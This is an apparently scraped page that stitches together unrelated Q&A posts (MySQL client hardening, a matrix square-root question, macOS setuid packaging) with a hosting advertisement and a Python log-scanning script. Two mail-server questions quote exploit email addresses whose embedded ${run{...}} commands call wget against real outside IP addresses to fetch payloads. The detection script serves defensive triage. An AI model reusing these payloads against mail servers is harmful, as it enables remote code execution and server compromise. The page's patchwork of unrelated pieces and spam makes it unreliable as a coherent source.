Security – How do I back up my queried data from my local MySQL server to a remote root computer unprotected entities?

I've installed a remote client computer in a server center owned by an entity that must also have the root directory of the client computer, as required by industry regulations. The client computer runs a C++ program that uses libmysqlclient.so and regularly polls a MySQL server in my office over the Internet.

The data is very sensitive, so I need to protect the data from being distributed throughout the data transfer process. No one is familiar with the server center, not even its owner, who has the root of the client machine.

First, the JSON-format database configuration of the C++ program includes the explicit IP address, port, user, and password. Any user with root privileges can read and use them to connect to our server from the client computer. Since the IP and port must be reported to the owner of the server center that manages the intranet, gateway, and firewall as required, I replace the user and password with encrypted strings in the configuration, and the C++ program decrypts them at startup to get the real user and password for connecting to the server.

However, the root user can replace libmysqlclient.so in the system with a changed version, so that the user and password are printed when the connection is established. So I change the C++ program to link libmysqlclient.a statically at compile time.

However, the transmitted data is still plain text. So I activate SSL on the MySQL server and change the user to SSL REQUIRE; then a man-in-the-middle attack should not be easy.

For SSL to work, the client computer must also contain files with ca, client-cert, and client-key. I'm wondering if the owner of the server center can capture the transmitted encrypted traffic and use those files to decrypt the data without knowing the username and password of the database.

Is there any obvious vulnerability on the client side after all these settings? Suppose that the network structure and the use of MySQL should not be changed.

E-mail exploit attempt intercepted – information requested – email to root+${…}@host

I have received an e-mail to the address below, which is an obvious exploit attempt. Does anyone have details about the particular exploit, so I can make sure I'm patched / not exposed:

root+${run{x2fbinx2fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@mymailserver.example.com

IH managed dedicated server | Root access | UK / USA | SSD storage | 1 Gbps burst | Anti DDos Pro

Infused hosting
https://infused-hosting.com

Web hosting, reseller hosting, virtual servers, domain names

Why choose us?

> Premium ticket support around the clock
> No contracts
> Managed servers
> 99.9% availability guarantee
> Full root access
> Guaranteed bandwidth
> Fast deployment
> Anti-DDOS protection

Here are our two popular Managed Dedicated Server offerings.

DS – UK Starter

Intel Xeon D-1520 – 4c / 8t – 2.2 GHz / 2.6 GHz
32 GB DDR4 ECC 2133 MHz
250 Mbps bandwidth (burst 1 Gbps) unlimited
softRAID 2 x 2 TB (included) Or SSD of your choice
Great Britain (London)
Anti DDoS Pro – Included
1 Free IPv4
root access
Delivery time up to 72 hours

Price from £ 92.99


DS – US Starter

Intel E3-1220LV2
Dual core CPU
2 x 2.30 GHz
4 GB RAM
1000 GB hard drive in RAID 1
5 TB bandwidth
2 free IPs
Full root access
Server location USA

Prices from £ 92.99 GBP


Contact our sales team for more information.

– Infused Hosting

Matrices – square root of a diagonalizable matrix

The square root of a diagonalizable matrix $A$ can be obtained as
$$ B = \sqrt{A} = D \lambda D^{-1} ~~~~ (1), $$
where
$$ \lambda = \begin{pmatrix} \lambda_1^{1/2} & 0 \\ 0 & \lambda_2^{1/2} \end{pmatrix}. $$
Here, $\lambda_{1,2}$ are the eigenvalues and $D$ is the diagonalizing matrix of $A$. Recently in a question:

Solving a matrix equation from four unknowns

The square root of
$$ P = \begin{pmatrix} 4 & 5 \\ 3 & 6 \end{pmatrix} $$
was requested such that $P = Q^2$. The eigenvalues of $P$ are $9, 1$; the method (1) and also the command `MatrixPower[P, 1/2]` from Mathematica give
$$ Q = \frac{1}{4} \begin{pmatrix} 7 & 5 \\ 3 & 9 \end{pmatrix}. ~~~~ (2) $$
However, a brute-force construction of $Q$ from four unknowns $a, b, c, d$ and solving the resulting equations, along with the conditions that $\operatorname{Trace}(P) = \operatorname{Trace}(Q^2)$ and $\det(P) = \det(Q^2)$, gives the matrix
$$ Q = \frac{1}{2} \begin{pmatrix} 1 & 5 \\ 3 & 3 \end{pmatrix}. ~~~~ (3) $$
Can one explain why the method in (1) and Mathematica ignore (3)? How can this be fixed?

usb – How do I create an installable app with the root setuid bit set?

I've inherited a codebase that needs updating, but I do not have the build scripts that created the final pkg file.

The code must access a connected USB device (which is treated as a drive) to read and write bits. Therefore, extended permissions are required. Due to the non-technical nature of the end users, they need to be able to click on the app and are not expected to run it from the sudo command line.

The current installer is installed at /Applications/myapp.app, where myapp.app/Contents/MacOS/myapp is set to -rwsr-xr-x root:staff permissions. After installation, this app runs flawlessly and without complaint.

I created a similar pkg file with pkgbuild and created a similar folder in /Applications with the same permissions: newapp.app/Contents/MacOS/newapp -rwsr-xr-x root:staff. However, when I try to run the app without sudo, I get the message "The application with the bundle ID newapp executes setugid(), which is not allowed."

My Mac runs macOS 10.13.6.
The app is Python, which has been packed into a binary file.

How should I pack this code so that it runs as root after installation?

Strange root command for frozen e-mail

Hello, today I found 5 randomly generated emails (the first part was random, the domain was the same and it belongs to one of our clients). I deleted the e-mail address, but then I saw an e-mail with this address as the sender address:

root + $ {run { x2Fbin x2Fsh t-c x22wget x2064.50.180.45 x2ftmp x2f000.000.00.000 x22}} @ server.my.net

The 000.000.00.000 corresponds to our server IP and server.my.net to our server hostname.

The emails were the typical phishing spam e-mails.

Should I be worried?

I ran rkhunter, which gave only warnings that I saw on Google were normal, and even chkrootkit, without any hit.

Thanks for your help.
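
A log-triage sketch for the `root+${run{…}}@host` addresses quoted in the two mail questions on this page, added here as an example and not part of either post: it flags any address whose local part carries a `${name{…}}` item, decodes the hex escapes, and lists the hosts named in the embedded command. The log layout, function names and sample lines are constructed for illustration; escapes are accepted with or without a leading backslash because the strings quoted above show them without one.

```python
import re

# Address whose local part embeds a ${name{...}} item, e.g. root+${run{...}}@host.
# Optional whitespace is tolerated because pasted copies are often re-spaced.
EXPANSION_ADDR = re.compile(
    r"\$\s*\{\s*(\w+)\s*\{(.*?)\}\s*\}\s*@\s*([\w.-]+)"
)
# Hex escape such as \x2F; the backslash is optional (see the lead-in).
HEX_ESCAPE = re.compile(r"\\?x([0-9A-Fa-f]{2})")
IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def decode_escapes(payload):
    """Turn x2F / \\x2F style escapes back into the characters they stand for."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), payload)


def scan(lines):
    """Return one finding per log line that contains an expansion-style address."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        match = EXPANSION_ADDR.search(line)
        if not match:
            continue
        operator, payload, target = match.groups()
        # Decoded for reading only; nothing here is ever executed.
        command = " ".join(decode_escapes(payload).split())
        findings.append({
            "lineno": lineno,
            "operator": operator,             # e.g. "run"
            "command": command,
            "hosts": IPV4.findall(command),   # candidates for egress-log review
            "target": target,                 # mail domain the address was aimed at
        })
    return findings


# Constructed sample lines (documentation-range IP, reserved .test domains).
SAMPLE_LOG = [
    "2024-01-01 10:01:02 rcpt to=<alice@example.test> accepted",
    "2024-01-01 10:01:09 rcpt to=<root+${run{x2Fbinx2Fsh -c x22wgetx20192.0.2.10"
    "x2Ftmpx2Fsamplex22}}@mail.example.test> rejected",
    "2024-01-01 10:02:11 mail from=<bob+news@example.test> accepted",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Hosts reported this way are worth checking against outbound firewall or proxy logs to see whether the mail server ever connected to them.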